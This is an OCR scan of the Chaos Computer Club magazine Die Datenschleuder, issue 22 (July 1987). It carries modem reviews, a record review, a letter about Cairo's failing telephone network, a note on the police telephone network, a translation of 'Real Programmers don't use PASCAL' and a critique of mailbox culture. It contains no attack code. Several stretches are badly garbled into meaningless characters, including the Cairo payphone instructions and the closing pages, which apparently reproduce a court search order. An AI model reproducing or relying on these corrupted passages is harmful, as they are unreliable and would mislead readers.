nung. Die Firma liefen, obwohl sie zur Cebit schon
ein neues Eprom hatte, zweieinhalb Monate danach
immer noch Modems mit dem alten Eprom aus.
2KXlHz vorweg fehlt. Ansonsten gut zu gebrauchen.
Modem: GVC 300
Generalvertrieb: Resco, Augsburg
Wertung: Von Kaif abzuraten
Besonderheiten: Nur 300 Baud maximal
Begründung: Scheint die Eigenheit zu haben, öfters
kaputt zu gehen (Drei Stück in einem Monat ist wohl
nicht mehr normal!). Kann nur 300 Baud. Wenn -
während das Modem einen Anruf erkannt hat und er
den 2 lOOHz sendet - ein Carrier anliegi, erkennt das
Modem diesen nicht. Also immer erst nach dem
2I00Hz-Ton senden. Überhaupt ein Witz, für 300
Seite 12
Baud soviel Kohle zu verlangen. Wenn schon illegal
denn schon richtig.
Modem: PC Link
Generalvertrieb: GVM, Düsseldorf
Wertung: Unter Umständen brauchbar
Besonderheiten: Modembox für MDB 1200-3,teuer
aber das sind die Modemboxen alle, FZZ-Zulassung
Begründung: Keine Spaces zwischen den Koman¬
dos erlaubt. Kein Hardware-Handshake bei 12(X)/75
Baud, daher Pufferüberlauf möglich. Reagiert im
Hayesmodus bei der Anruferkennung allergisch auf
gewisse Koppler (Epson z.B.). Die Login-Meldung
konunt deshalb nur verstümmelt an. Sonst keine
Probleme. Der Dealer wollte uns auch erst nicht
glauben, aber wir haben ihn eines Besseren belehn.
Wir fordern endlich anständige Hayes-
Modems!!
Wir fordern hiermit jeden Herstellerauf, der was auf
sich hält, uns so ein Ding mal für eine Woche zu
leihen, damit wir es testen können. Wir sind zu
erreichen in der lUS-Mailbox 0203/596245, an
“Hackowiz“, oder per Snailmail an Postlagerkar-
te;056945 B, 4100 Duisburg 1
Hackowiz
CUNCH/SYSOPIGAST/06.07.87/19:28/5621
Radio K.A.O.S.
Wie man Perlen vor die Säue wirft
“This is K.A.O.S.. You and I are listening to
KAOS in Los Angeles. Let’s go to Ihe telcphonc
now and take a requesl.“
So beginnt das neueste Epos von Roger Waters, dem
Mann, der dafür sorgte, daß Pink Floyd hart am
Mainstream vorbei zur Kultband wurde und den
experimentellen Exzessen von Sid Barrel & Co
Grenzen setzte. Der Plot ist schnell nacherzählt: Der
autistische Protagonist gelangt in den Besitz eines
drahtlosen Telefons, das er zusammen mit seinem
Bruder aus dem eingeschlagenen Schaufenster des
Electronic-Shops geklaut hat und erschliesst sich
damit das globale Dorf, knüpft Kontakte zu Com¬
putern in aller Welt und spielt sein eigenes Star-
Wars, nicht ohne vorher dafür gesorgt zu haben, daß
nichts passieren kann. Seine Aktion wird zum Aus¬
löser für die Menschheit, derri atomaren Wahnsinn
ein Ende zu setzen.
Saite 13
Diese verkürzte Darstellung macht deutlich, daß hier
gleich ein halbes Dutzend interessanter Themen ver¬
schenkt wurden. Musikalisch zwischen ’Dark Side
of the Moon’, ’When the Wind blows’ und anderen
Endzeit-Dramen angesiedelt, verpasst Waters die
Gelegenheit, sich kritisch mit den neuen Techno¬
logien und ihren Auswirkungen auseinanderzuset¬
zen. Erschreckenderweise bleibt die Platte hörbar,
was für die Qualitäten des Musikers Walers spricht,
dem der Dramaturg Waters das Wasser nicht reichen
kann.
Man kann sich des Gefühls nicht erwehren, daß hier
versucht wurde, nachzuholen, was seit zehn Jahren
versäumt worden ist. Fairlight, Emulator, Syncla-
vier, Wave Generator und wie sie alle heissen, die
Superstar-Aggregate der 80er Jahre, eingesetzt von
Leuten, die nichts Besseres damit anzufangen wis¬
sen, als 'Miami Vice’ in Töne zu setzen, sind nur
Symptone für eine Geisteshaltung unter den Mu¬
sikschaffenden, die im Wesentlichen den kommer¬
ziellen Aspekt sehen, wenigerden künstlerischen.
Womit die notwendige Brücke geschlagen wäre, zu
der Frage, was der Quatsch in der DATEN¬
SCHLEUDER zu suchen hat: Dem geneigten (ca. 72
Grad) Leser wird nicht entgangen sein, daß hier
Parallelen zu dem Artikel 'Art wer ?’ in DATEN¬
SCHLEUDER 19 gezogen werden können. Wenn
Kunst & Computer für uns ein Thema ist, dann
Musik & Computer erst recht. Wir werden uns künf¬
tig etwas mehr damit beschäftigen. Und gerade das
erwähnte Produkt aus der Stimmungsfabrik Waters
ist idealer Ansatzpunkt fürdie Frage: 'Wie konnte es
soweit kommen ?’ Dazu in späteren Ausgaben mehr.
Klappe, Schnitt, und ab ins Kopierwerk.
goblin
CUNCHIDATENSCHLEUD ER -RED!
SYSOP/03.07.87/23:36/2416 Zeichen
Snfcnörfjlcubcr
Das Globale Dorf
Ein Brief aus Kairo
Liebe Freunde, als ich unlängst von Athen nach
Kairo flog, saß ein japanischer Geschäftsmann
neben mir. Wie sich im Gespräch herausstellte,
vertritt er in der ägyptischen Hauptstadt ein ja¬
panisches Unternehmen. Auf die Frage, was er in
Athen gemacht habe und wie lange er dort ge¬
wesen sei, antwortete er: “Ich war nur für ein
paar Stunden da, ummitmeinerFrau und meiner
Firma in Japan zu telefonieren. Kairo ist nämlich
die Stadt der toten Telefone.“
Von Kairo ins Ausland zu telefonieren ist in der Tat
so gut wie unmöglich. Wer es trotzdem versucht,
bekommt vom Fräulein vom Amt die Auskunft, daß
die Wartezeit zwei bis drei Tage beträgt. Meist
wartet man jedoch vergeblich. In Kairo wird schon
der Versuch, von einem Nilufer ans andere zu tele¬
fonieren, zur Geduldsprobe.
Kairo ist zwar mit fast zehn Millionen Einwohnern
die größte S tadt Afrikas, es gibt aber nuretwa 80.000
Telefonanschlüsse. Das behauptet zumindest das
zuständige Ministerium für Kommunikation. Wie
viele von den vorhandenen Anschlüssen tatsächlich
funktionieren, weiß allerdings kein Mensch zu sa¬
gen. An Apparaten herrscht offenbarkein Mangel. In
Geschäften, Büros und komfortablen Wohnungen
befindet sich fast immer ein häßliches schwarzes
Telefon. Wenn man danach fragt, ob man es mal kurz
benützen dürfe, dann erhält man fast immer die
Antwon: “Im Moment geht es leider nicht“. Was die
liebenswürdigen Ägypter als Moment bezeichnen,
das kann in Wirklichkeit eine Zeitspanne von Wo¬
chen, Monaten oder Jahren sein.
Als ich in Kairo einmal auf Wohnungssuche ging,
machte ich'dem Makler von Anfang an klar, daß ich
als Journalist auf ein Telefon angewiesen sei. Das
sah er auch ein. Ais wir tagelang von ihm ausge-
kundschaftcte Wohnungen besichtigten, stürzte ich
mich immer sofort auf das Telefon, das - wie ver¬
sprochen - auch vorhanden war. Die Hälfte der
ausprobienen Apparate war jedoch tot. “Das kann
nur einen Moment dauern“, versuchte der Makler zu
trösten - ein schwacher Trost.
SnfcnSdjIcuhcr
Ct-br<]uchiartu«(äurig i/ef
i-ifniprochjfllcn in
^ j
iiiä'i tit.tülefonä't fi iiiuBr
I. Kiiic .MUiuv 2 u 1 1‘luatrr in
slvvki.'ii f*j J" llutt
UüY ßl-chii'riu
Heil Ilürer ukiivliuivii und diu
Nuuiiuer uülitvii jü.
ebuJti uQ-Üaiii'iiiä'^a cjida'<i>*<ja.r en-iii'iura
ul-ma4lü'ba
Ü. Subulü der ‘J'eiliieliiiier uiilivortct, auf den
Knopf drücken ka«! .iLk .>^L
biimiga'r md ina jiru'iid ^alck cl-iiiuUka'l-
lini i'dyat ‘'as-ui'rr
4 . Wenn die (jeMÜiiaelile Niiiiiiner beseliil Kl,
den Iliirer wieder uuileyeii und den knüpf
drUckeii. l>le Mtiiiae fällt von üelbsl lirruus
U- i»i j j äjI .—n Jfc». ji.^ir ji 1
in kä'jiiL en-ni'iiira fi «—^ ÄJL^l kä-J /
inaacliYii’Ia.hutteO'ßam-mi'^ft niahttMe'ha
turdyat ‘•aa- ai'rr ti'ß’at el-^u‘mle iiiiii
iiafQu'lia
Das Kairoer Telefonnetz wurde vor dem zweiten
Weltkrieg von einer britischen Firma gelegt. Seither
geschah so gut wie nichts mehr. Die Leitungen
wurden nie mehr überprüft, instand gesetzt oder gar
erneuen. Das Won Instandhaltung ist den Ägyptern
völlig unbekannt. Dies trifft übrigens nicht nur auf
Telefone zu, sondern auch auf Aufzüge, Autos und
andere technische Anlagen, Solange sie funktio¬
nieren, sind die Ägypter glücklich und zufrieden.
Wenn siekaputtgegangen sind, dann waresein böser
Streich Allahs, der mit ein paar kräftigen Haramer-
schlägen oder einem Stück Klebestreifen behoben
wird. Im Ministerium oder beim Kairoer Fernmel¬
deamt scheint jedenfalls nie jemand dran gedacht zu
haben, daß die Telefonleitungen aus billigem Vor-
kriegsmaterial im Laufe der Jahrzehnte mürbe und
emeuerungsbedürftig werden könnten. Manche be¬
haupten sogar, daß inzwischen niemand mehr weiß,
wo die Kabel liegen. Fest steht jedenfalls, daß viele
Leitungen in Abwässerkanäle abgesackt sind und
unbrauchbar wurden. Andere sind von Ratten und
Mäusen im Kairoer Untergrund angenagt und still¬
gelegt worden.
Auch wenn man von Telefontechnik nichts versteht,
dann sagt einem ein Blick in einen Kairoer Kabel¬
schacht - die dazugehördenden Eisen- oder Beton¬
deckel sind längst gestohlen worden - alles, worüber
man sich oft gewundert hat. Er ist fast immer mit
Abwässern und Abfällen voll. Dazwischen befindet
sich eine bunte Vielfalt von dünnen Drähten. Nicht
einmal die Techniker des Telegrafenamtes, die sich
Seite 14
gelegentlich in solchen Schächten zu schaffen ma- Das bruchstückhafte Fernsprechnetz hat nur eine
Chen, scheinen zu wissen, wie dieser Drahtverhau gute Seite. Man hat immer eine glaubhafte Ausrede
zusammengehört. Diese Techniker sind übrigens in 2 ur Hand, wenn man Leuten aus dem Weg gehen
Kairo äußerst gefürchtet. Wenn siees nämlich schaf- will, und die Abschicdsfloskel “Wirrufen uns in den
feii, einen gestörten Anschluß instand zu setzen, näch.sten Tagen an“ ist nicht ernst gemeint,
dann legen sie bei dieser Arbeit zehn andere lahm. Herzlichst Ihr W. Stockklausner
“Wenn sie wieder anrücken, dann sind schon hundert
Telefone tot“, erklärt ein Kairoer Telefonbesitzer,
dessen Apparat noch funktioniert. (aus: Franl^urter Rundschau, 135.78)
Tod kam mit dem Telefon
AFP, Kairo
Aus Freude dariiber, daß er nach 15
^ Jahren endlich den beantragten Tele-
ronanschtuß erhalten sollte, ist ein 50
Jahre alter Ägypter am Samstag an
c.' einem Herzschlag gestorben. Die Kai-
roer Presse berichtete, der Musiker
^ Adel Atteya Mostafa sei beim Unter-
.5 schreiben des Anschlußformuiars
plötzlich tot zusammengebrochen.
Die Kairoer Telefonmisere kostet Nerven und nicht
zuletzt Zeit. In Geschäften, Büros und Banken ver¬
bringen die Angestellten manchmal Stunden damit,
eine einzige Nummer anzurufen. Sie sitzen vor dem
Telefon, blicken verträumt aus dem Fenster und
warten auf den erlösenden Summton, der eine freie
Leitung verspricht. Andere trommeln ununterbro¬
chen wütend auf den Apparat und glauben, daßsie
damit mehr erreichen. Hat man als Kairoer Tele-
fonbenützer endlich ein Freizeichen erhalten, dann
beginnt eigentlich erst der richtige Nervenkitzel.
Nun muß sich nämlich heraussteilen, ob der Apparat
des Teilnehmers funktioniert, den man erreichen
will. Vielleichi ist er auch besetzt oder es meldet sich
ein anderer Teilnehmer, weil der Anschluß bei einer
Reparatur vertauscht wurde.
Nach meinen Erfahrungen spielt sich der Versuch, in
Kairo jemanden telefonisch zu erreichen, so ab: Ich
wähle die Nummer zwanzig mal. Dazu brauche ich
zwei Stunden, weil das Freizeichen auf sich warten
läßt. Bei zehn Wäehlversuchen tut sich nichts, bei
sieben anderen enönt das Besetztzeichen. Dreimal
meldet sich ein falscher Teilnehmer. Ich gebe auf,
setze mich ins Taxi und fahre durch den chaotischen
Kairoer Verkehr zu meinem Gesprächspartner.
Viele ägyptische und ausländische Firmen verzich¬
ten inzwischen auf die Dienste des Telefons. Sie
beschäftigen Boten, die schriftliche Nachrichten
überbringen und mit der Antwort zurückkommen.
Damit sie nicht im Verkehrsgewühl so leicht stec¬
kenbleiben, werden sie mit Fahnädem oder Mopeds
losgeschickt.
Hicom im bundesdeutschen
Polizeinetz
Wie die SIEMENS Pressestelle mitteilt wur¬
de jetzt im Landesnetz der Polizei Baden-
Würtemberg im Polizeirevier Künzelsau das
erste Kommunikationssystem Hicom ais
Endvermittlungsstelle im Fernsprechorts¬
netz der Polizei in Betrieb genommen. Drei
weitere Hicom-Systeme für die Polizeire¬
viere in Geislingen, Kirchheim und Felibach
gehen in Kürze in Betrieb.
Alle vier Anlagen stattet Siemems mit einem Ge¬
bührencomputer zur Gesprächsdatenerfassung und
-auswertung aus. Privatgespräche werden nach der
Wahl einer Kennzahl gesondert erfaßt und abge¬
rechnet.
Das vom öffentlichen Nachrichtenverkehr unab¬
hängige Fernsprechsondernetz der Polizei in der
Bundesrepublik Deutschland dient vor allem der
polizeiinternen Nachrichtenübertragung zwischen
den Polizeien der Länder, dem Bundeskriminalamt,
dem Bundesgrenzschutz sowie den Behöreden,
Diensstellen und Beamten (!) des Bundes und der
Länder, die mit Polizeiaufgaben betraut sind. Die
Landesnetze dieses Sondemetzes gliedern sich je¬
weils in Vierdraht-Knotenvermittlungen und Ne¬
benstellenanlagen als Endvermittlungen. Diese
Endvermittlungs-Nebenstellenanlagen sind über
Querverbindungen an eine Knotenvermittlung und
über Amtsleitungen an das öffentliche Fernsprech¬
netz angeschlossen.
Wer vom 20. bis 27. Oktober ’87 zur Weltausstel¬
lung des Femmeldewesens der TELECOM in Genf
reist, kann sich dort über den neuesten Stand der
ISDN-Technik, nicht nur von Siemens, informieren.
LS23
SolcMürf^icBfccr
Seite 15
Real Programmers don’t use
PASCAL Teil III
In was für einer Art von Umgebung funktioniert
ein Richtiger Programmierer am besten? Das ist
eine wichtige Frage für den Auftraggeber von
Richtigen Programmierern. In Anbetracht der
Stange Geld, die ein Stab von Mitarbeitern ko¬
stet, erscheint es am besten, sie oder ihn in einer
optimalen Umgebung unterzubringen.
Der typische Richtige Programmierer lebt vor einem
Computerterminal. Um das Terminal herum liegen
die Listings aller Programme, an denen er jemals
gearbeitet hat. Diese sind in grob chronologischer
Ordnung auf jeder ebenen Fläche des Büros gesta¬
pelt. Ebenfalls zu finden ist etwa ein halbes Dutzend
halbvoller Tassen mit kaltem Kaffee. Gelegentlich
schwimmen Zigarettenstummel in dem Kaffee, ln
einigen Fällen enthalten die Tassen auch Orangen¬
saft. Weiters, äußerer ist wirklich SEHR gut, werden
sich Kopien des OS JCL-Handbuchs finden, sowie
die 'Principles of Operation’, aufgeschlagen auf teil¬
weise recht interessanten Seiten. An die Wand ge¬
heftet befindet sich ein auf einem Uralt-Printer ge¬
druckter Snoopy-Kalender aus dem Jahre 1969.
Über den Boden verstreut liegen die Verpackungen
diverser mit ErdnuDbutter gefüllter Käsebrote.
Schließlich, in der Unken obersten Schreibtisch¬
schublade, unter einer Schachtel Kekse, befinden
sich Flußdiagramm-Fotmulare, die ein Vorgänger
da zurUckgelassen hat. Richtige Programmierer
schreiben Programme, keine Dokumentation, die für
das Wartungspersonal hinterlassen wird.
Der Richtige Progreammicrer ist, unter großem
Druck, in der Lage, 30, 40, sogar 50 Stunden in
einem durch zu arbeiten. Er schätzt es, so zu arbeiten.
Leeriaufzeiten sind für den Richtigen Program¬
mierer kein Problem; sie geben ihm die Möglichkeit,
ein Mützchen Schlaf zwischen zwei Compüer-
durchgängen zu nehmen. Wenn nicht genug Ter¬
mindruck auf dem Richtigen Programmierer lastet,
tendiert er dazu, die Zügel schleifen zu lassen, indem
er in den ersten neun Wochen an einem kleinen, aber
interessanten Bereich des Problems herumbastelt.
Dann schließt er die gesamte Arbeit in der letzten
Woche ab, in zwei oder drei 50-Stunden-Marathons.
Das beeindruckt nicht nur seinen Auftraggeber, son¬
dern liefert gleichzeitig eine bequeme Ausrede da¬
für, daß keinerlei Dokumentation vorhanden ist.
Generell: Kein Richtiger Programmierer arbeitet
von 9 bis 5, außer in der Nacht. Richtige Program¬
mierer tragen auch keine Krawatten. Richtige Pro¬
grammierer tragen keine hochhackigen Cowboy¬
stiefel. Richtige Programmierer treffen gegen
Mittag im Büro ein. Ein Richtiger Programmierer
weiß den Namen seiner Frau, oder er weiß ihn auch
nicht. Was er auf jeden Fall weiß, ist die gesamte
ASCII-(oder EBCDIQ-Codetabelle. Richtige Pro¬
grammierer wissen nicht, wie man kocht. Lebens¬
mittelgeschäfte sind selten um 3 Uhr morgens ge¬
öffnet. also müssen sie mit Keksen und Kaffee über¬
leben.
Wirft man einen Blick in die Zukunft, so ziehen
einige Richtige Programmierer in Betracht, daß die
jüngste Programmierer-Generation nicht mit den
selben A ussichten groß geworden ist wie ihre Eltern.
Viele von ihnen haben nie einen Computer mit einer
Schalttafel gesehen. Nur wenige, die heute von der
Schule kommen, beherrschen Hexadezimalarith¬
metik ohne einen Taschenrechner. Die heutigen
College-Absolventen sind gegenüber der hanen
Programmier-Wirklichkeit wie in Watte gepackr
durch Source Level Debugger, Text-Editoren, die
Klammem zählen, und benutzerfreundliche Be¬
triebssysteme. Am schlimmsten ist, daß einige die¬
ser angeblichen Computerwissenschaftler eine Gra¬
duation schaffen, ohne FORTRAN zu lernen! Steht
uns bevor, eine Gesellschaft von Unix-Hackem und
Pascal-Programmierern zu werden?
Nach meinem Dafürhalten sieht die Zukunft für
Richtige Programmierer nach wie vor glänzend aus.
Weder OS/370 noch FORTRAN zeigen Anzeichen
auszusterben, den boshaften Bemühungen von
Pascal-Programmierern zum Trotz. Auch sehr sub¬
tile Tricks wie etwa der Versuch, FORTRAN struk-
turiene Code-Konstmkte unterzujubeln, sind fehl-
geschlagen. Ja sicher, ein paar Computerhändler
sind mit FORTRAN77-Compilem rausgekommen,
aber in jedem von denen gibt es einen Weg, auf dem
er sich selbst in einen FORTRAN66-Compiler zu¬
rückverwandeln kann - um DO-Schleifen zu com-
pilieren wie Gott es vorgesehen hat.
Sogar Unix scheint nicht mehr ganz so schlimm für
Richtige Programmierer zu sein, wie es einmal war.
Die letzte Version von Unix hat die Stärken eines
Betriebssystems, das eines Richtigen Programmie¬
rers würdig ist. Es hat zwei unterschiedliche und
subtil inkompatible User Interfaces, einen überzo¬
genen und komplizierten DFÜ-Treiber, und vir¬
tuellen Speicher. Wenn man von der Tatsache ab-
sicht, daß es strukturiert ist, kann sogar das Pro¬
grammieren in C für einen Richtigen Programmierer
annehmbar werden. Es gibt kein Type Checkjng,
Variablennamen sind sieben (10? acht?) Zeichen
lang, und das Bonbon des Pointer-Datentyps ist noch
hinzugefügt. Es ist aJs hätte man die besten Teile von
SntciiSdjlcubcr
Seite 16
FORTRAN und Assembler in einer Sprache; noch
ohne an einige der mehr künstlerischen Anwen¬
dungen für „define zu denken.
Nein, die Zukunft ist nicht dunkel, ln den letzten
J ahren hat die Presse auchdieglänzendeScharneuer
Computerleutchen und Hacker bemerkt, die aus Or¬
ten wie Stanford oder MIT in die Richtige Welt
rausgehen. Allem Anschein nach lebt der Geist des
Richtigen Programmierens in all diesen jungen
Männern und Frauen weiter. Solange es abartig de-
finierteSprungziclc, bizarre Bugs und unrealistische
Tabellen gibt, wird es Richtige Programmierer ge¬
ben, gewillt einzuspringen, das Problem zu klären
und die Dokumentation auf später zu verschieben.
Lang lebe FORTRAN!
Ed Post; Wilsonville, Oregon; Datamation 7183.
(übernommen aus FORTHTREE/Hamburg)
Übersetzung ins Deutsche von Peter Glaser
Mailboxen in den Kinderschuhen
Anmerkungen
Mittlerweile bin ich seit ca. einem Jahr online.
Anlaß für mich, die Mailboxszene einmal kritisch
zu beleuchten. Meine Ausführungen beziehen
sich in erster Linie auf Hamburg, dürften sich
aber im wesentlichen auf das restliche Bundes¬
gebiet übertragen lassen.
Wieviele Anwender mag es wohl in Hamburg geben,
die sich mittels DFU mehr oder weniger regelmäßig
in den ca. 20 örtlichen Mailboxen tummeln? Ich
würde schätzen, daß die Zahl sehr deutlich unter
1.000 liegt. Die Zahl deijeniger aber, denen nur noch
einAkkustikkopplerfürnurca. DM 200,- (und evtl,
noch eine nachriistbare ser. Schnittstelle) fehlt, um
DFü betreiben zu können, würde ich auf ein paar
10.000 schätzen).
Warum aber läßt die ganz große Mehrheit der Com¬
puterbesitzer die DFü und Mailboxen offensichtlich
völlig kalt? Und das, wo in den Computerzeii-
schriften und der allgemeinen Presse die DFü jaalles
andere als totgeschwiegen wird? Obwohl die DFü so
jung nun auch nicht mehr ist? Wie paßt das alles
zusammen?
Ich denke es liegt daran, daß die Mailboxen noch
immer in den Kinderschuhen stecken. Und sie ma¬
chen keinerlei erkennbare Anstalten, aus ihnen her¬
auszuwachsen. Gewiß, es gibt eine zunehmend grö¬
ßere ZahJ von Boxen, die nicht mehr auf einem C64
mit I80kB-Floppy arbeiten; sondern auf 68k-
Rechnem oder XT's, AT’s und sogar 386er unter
SiiifciiSdjfciiiicr
Unix. Festplatten von 20, 30 und mehr MB sind
schon fast Standard, Auch nimmt die Zahl der Bo¬
xen, die zwei und mehr Ports bieten, in letzter Zeit
ständig zu. Vereinzelt sind lobenswerterweise auch
endlich Bestrebungen zu erkennen, eine einiger¬
maßen einheitliche und bedienerfreundliche Be-
nutzerführung (GEONET-kompatibel) einzuführen.
Alle diese Entwicklungen sind grundsätzlich zu be¬
grüßen.
Trotzdem bleibe ich bei meinem doch ziemlich ver-
nicluendcn Uneil! Einige Sysops verfallen in einen
Technikrausch, was für sich betrachtet auch noch
nichtunbedingt negativ zu bewerten ist. Aberes wird
verkannt, daß die Technik nur Mittel zum Zweck ist
- nicht weniger, aber auch nicht mehr! Denn an dem
Inhalt der Boxen wird kaum etwas geändert. Der
Inhalt ist und bleibt weitestgehend uninteressant.
Jedenfalls für die große Mehrzahl von Computer-
besitzem, die die DFÜ bisher hat nicht locken kön¬
nen.
Wie sieht denn heute eine Mailbox aus? Da gibt es
die GEONET-Boxen und die vielen regionalen
“Freak-Boxen“. Die GEONET-Boxen bieten zwar
Telex, Intermail und Datenbankzugriffe. Aber
sonst? An den öffentlichen Brettern (und neuerdings
sogar in den privaten Fächern - pfui Teufel!) haupt¬
sächlich Werbemüll kommerzieller Anbieter den
man, wenn man darauf steht, in BTX besser und
billiger haben könnte. Infolgedessen werden diese
Boxen hauptsächlich von Firmen und Freiberuflern
genutzt, die sich einen geschäftlichen Vorteil davon
versprechen. Die nicht-kommerziellen regionalen
Boxen sind vom Werbemüll glücklicherweise bisher
verschont geblieben. Interessanter sind sie dennoch
nicht. Was bieten sie schon viel mehr als das klas¬
sische (und im Prinzip gar nicht schlechte, ja wohl
sogar fast unverzichtbare!) Suche, Biete, Allge¬
meines, Kontakte sowie evtl, ein paar Rechnercomer
und wenn es hoch kommt noch einige Programme
zum download? (Fast) nichts! Das kann doch wirk¬
lich allenfalls einen computerbegeisterten Freak rei¬
zen.
Ich halte das für sehr bedauerlich. Maiiboxen könn¬
ten sehr viel mehr bieten, als den hier angedeuteten
Service für gewisse Kreise von Geschäftsleuten ein¬
erseits und die Computerfreaks andererseits. Dienste
und Informationen, die nicht nur für diese beiden
Gruppen von Computerbesitzer potentiell interes¬
sant sind, sondern für jeden.
Bretter wie beispielsweise G.ID, Umwelt, Mitfahr¬
zentrale in der CLINCH gehen schon in die richtige
Richtung, schöpfen die potentiellen Möglichkeiten
einer Mailbox aber noch lange nicht aus, Mailboxen
Seife 17
könnten preiswene und top-aktuelle Stadt- und
Stadtteilzeitschriften herausgeben. Sie könnten Fo¬
rum für Bürgerinitiativen, Parteien, Vereine aller Art
sein. Sie könnten Anzeigenblätter ersetzen oder er¬
gänzen. Mailboxen wären das ideale Diskussions¬
und Informationsforum für alle nurerdenkliche The¬
men. Das sind nur wenige Beispiele. Der Phantasie
sind kaum Grenzen gesetzt.
Aber in dieser Richtung tut sich fast gar nichts. Die
meisten Sysops scheint die Technik ihrer Box viel
mehr zu interessieren als deren Inhalt. Leicht ist es
auch gewiss nicht, hier etwas erfolgreich zu unter¬
nehmen. Denn wenn einraalein interessanter Ansatz
unternommen wird, scheitert er meist daran, daß sich
niemand dafür interessiert. Das liegt eben daran, daß
bisher nur wenige die DFü nutzen, und sich diese
wenigen aus zwei ganz speziellen Interessenten¬
kreisen rekrutieren. Aberdas hat seine guten Grün¬
de.
Wie schon erwähnt, wird in der (Fach-) Presse viel
über DFü und Mailboxen berichtet. Wenn man diese
Berichte liest, drängt sich der Eindruck auf, DFÜ sei
nur etwas für gestreßte Geschäftsleute (Typ: jung,
dynamisch, erfolglos), die unbedingt in einer ame¬
rikanischen Datenbank nach den neuesten Patenten
recherchieren müssen, oder aber für leichenblasse,
picklige, pubertäre Computerkids, die Tag und
Nacht vorm Rechner sitzen, um den Haspa-Coup des
CCC nachzuahmen oder sogar zu übertreffen. Mil
solchen Darstellungen kann man den durchschnitt¬
lichen Computeranwender die DFü natürlich nicht
schmackhaft machen.
Die relativ wenigen User, die sich von diesen Dar¬
stellungen nicht abschrecken lassen, werden aber
schnell frustriert, wenn sie sehen, was die DFü ihnen
zu bieten in der Lage ist. Der Akkustikkoppler ver¬
staubt oder wird wieder verkauft... Wie könnte man
aus dieser Misere kommen? Ich glaube, es müßte
zweigleisig vorgegangen werden.
Einerseits müßten sich die Sysops nicht nur um den
technischen, sondern auch und gerade um den in¬
haltlichen Ausbau ihrer Boxen verstärkt bemühen.
Natürlich kann das nur bei tatkräftiger Mithilfe der
User gelingen. Diese ist daher vermehrt anzustreben.
Sicherlich ist das leichter gesagt, als getan. Aber der
Versuch muß unternommen werden.
Daneben müssen aber auch neue User geworben
werden. Nicht aus den typischen Kreisen, die schon
heute die Boxen benutzen, sondern der “Otto-
Normal-Usei" muß angesprochen werden. Dafür
muß darauf hingewirkt werden, daß die Berichter¬
stattung in der (Fach-)Presse sich wandelt. Auch die
Selbstdarstellung der Mailboxen und Computerc-
Seile 18
lubs läßt in diesem Sinne stark zu wünschen übrig.
Weiterhin müßten die User möglichst direkt ange¬
sprochen werden. Was würde es beispielsweise groß
kosten, wenn sichdie örtlichen Mailboxen und Com¬
puterclubs zusammentäten und die Händler bäten.
Jedem verkauften Computer ein Flugblatt von ihnen
beizulegen. Darin könnte dem neuen, stolzen und
meist hilflosen Computerbesitzer Hinweise gegeben
werden. Z.B., daß es neben Spielen und Text- /Da¬
tenverarbeitung auch noch DFü und Mailboxen gibt.
Ganz in seiner Nähe. Preislich und technisch leicht
zu erreichen. Und natürlich was das neue Medium
gerade ihm an konkreten Vorteilen und Leistungen
bietet. Nur das muß halt mehr sein, als das obligate
Suche, Biete,...
Wenn sich in der hier angedeuteten Richtung nicht
etwas bewegt, dann werden wir in einigen Jahren ein
paar Boxen haben, die auf einer Cray II laufen, in
denen aber bei kaum gestiegenen Userzahlen der
gleiche Müll zu lesen sein wird wie heute auf einem
PC und früher auf einem C64.
STOEPSEL
IMPRESSUM
Die Datenschleuder Numero 22 • Juli 1987
Das wissenschaftliche Fachblatt für Daten¬
reisende
D-2000 Hamburg 20
Schwenckestrasse 85
Geonet; Geol:Chaos-Team
CLINCH : Chaos-Team
Btx: ‘Chaos.,
tel; 040-4903797 / 040-483752
ViSdP: Reinhard Schrutzki
Herausgeber Chaos Computer Club
Mitarbeiter (u.a.):
DDT, A. Eichler, P. Franck, H. Grusel, Herward
Holland-Moritz, jwi, Marina Kem, KS, M. Kuehn,
Andy M.-M., J. Nicolas, padeluun, Poetronic, S.
Stahl, S. Wemery.
Nachdmck für nichtgewerbliche Zwecke bei Quel¬
lenangabe erlaubt.
GutereinDruck im Selbstverlag.
Juli 1987
£>fllcnßif|lcubcr
Numero 23 - Oktober 1987
kleiMamge
Arnlsperlf l»l Mnrnhii »’0
ii.'iiAtii.Tii.. 1.- '.<• ^572
162 0. 060/67
I 111
M-in? 572
16.9.190?
41 .n 36/B7
Beschluß
t.i «l'•m rfiiitfllMtiii«vcrlnliirM (iru|fii Stoffen ] V’ • F TI • T JT •
f.ffh, ln Vuf»p#rtal, u-*.
der Ann
■ßhene von Daten
l»»M lilifl'i fliK 1 l.'itubuiq. AblniliHUj ^OP.
iIiimIi H«’n /jüc nirhiri (irrt an» Amt^qprirhl f'jjßcllj
Auf Aiil!;i(i fit’t r»liMl';;mw.ili' 5 » h;ill l*f'i rlt-tn lil IbinilitiMi wiifl <lif Dtiit lnir Iiiiimi
KIX ilfi Wnlm iMifl N>‘l«'iitriiitn>*
KIK «li'T CiPsclinft« imtl simsii»int« nruirlijraiitnp
aw / np^t:iiiiiHif|if'n stc/fcn Vemery
Eppendorfcr Lendrt.r. 165 bei Tlslua,
20CX) Harahur/f IO,
der ihm gehörenden Sachen
5 r'wi»* / 2 B>fK iMul ^Cttirr/XOCXXKinflfnlit 7 C(iqp an(iPOi(lf»r(
fi t ii u iP n ;
[i,.t / nKK nrsciminiiil'’ Is! aiifqiniul dpi tiislH'iiiipii Etiilitlliinqpii vpidai hlirt,
gemelnrnm mit noch nicht »nsrclchand identlllriertrn Clubolljllodem
Yon IJarehtirg aus ln dar Zelt nach dam 01. On. 1996 jvwellr. allein oder*
5 eijelnpalwftllch handelnd durch mehrere aolbatMndigr HrndlunR^n,
pwellfl durch dieselbe llandlum
• ) unbefugt Daten, die nicht für aie baatimmt und di« aegen unberech¬
tigten Zugang beaonder« gee.lchert sind, sich odrr el.nptn anderen
vernchefft tu haben,
b) eine Datenverarbeitung, die dUr einen freaden betrieb ein Crendes
Vntemehieen pder eine Behörde von vesentlioher Bedeutung lat, de-
I «uroh gtatBrt Bu bttMn, ««8 alt r*oht»wl<lrU D«ten la.oht-n,
' «nt.rdrUokt.n, «mbrauonbar aaoht.n o4.r T*rllnd»rt»n,
Indn «ll.ln hBnd.lnd od.r ■•■■Inaaa
1) fnd«cö^t»r*r«t*» TAX «.r turopil.ohm Ori«nlP.tl»n fUr
K.mforpohitn* (C*»») ln O.nl flchw*l«) D.t«n mi"-
>pkht«n und vunn<l«r*«D, vob*l ««J
T»r«nd*rt wur«l»n, 4a« fUr 41« l.raohtl«!.!! k.ln. (Wgllohk.lt
